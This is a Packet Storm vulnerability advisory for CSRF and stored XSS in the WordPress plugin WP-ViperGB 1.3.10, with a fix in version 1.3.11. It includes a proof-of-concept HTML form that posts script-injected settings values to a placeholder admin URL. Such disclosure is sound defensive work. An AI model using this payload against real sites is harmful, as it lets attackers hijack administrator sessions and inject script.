Lucene search
Morten NortoftPACKETSTORM:129501HistoryDec 12, 2014 - 12:00 a.m.
WordPress WP-ViperGB 1.3.10 CSRF / XSS
2014-12-1200:00:00
Morten Nortoft
packetstormsecurity.com
74
`Title: WordPress 'WP-ViperGB' plugin - CSRF/XSS
Version: 1.3.10
Author: Morten NΓΈrtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/wp-vipergb/
Notified WordPress: 2014/11/27
----------------------------------------------------------------
## Description:
----------------------------------------------------------------
WP-ViperGB is a WordPress plugin designed to replicate the appearance and behavior of the discontinued Viper Guestbook project. It makes it easy to add a stylish and user-friendly guestbook to your blog.
## CSRF:
----------------------------------------------------------------
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.
## Stored XSS:
----------------------------------------------------------------
Some settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.
PoC:
Log in as admin to the vulnerable site and press the submit button on this form:
<form method="POST" action="http://vuln.site/wp-admin/options-general.php?page=wp-vipergb">
<input type="text" name="vgb_page" value="0"/><script>alert(1);</script>"><br />
<input type="text" name="vgb_style" value="Default"><br />
<input type="text" name="vgb_items_per_pg" value="100"/><script>alert(2);</script>"><br />
<input type="text" name="vgb_show_browsers" value="1"><br />
<input type="text" name="vgb_show_flags" value="1"><br />
<input type="text" name="opts_updated" value="1"><br />
<input type="text" name="Submit" value="Save"><br />
<input type="submit">
</form>
## Solution
----------------------------------------------------------------
Update to version 1.3.11
`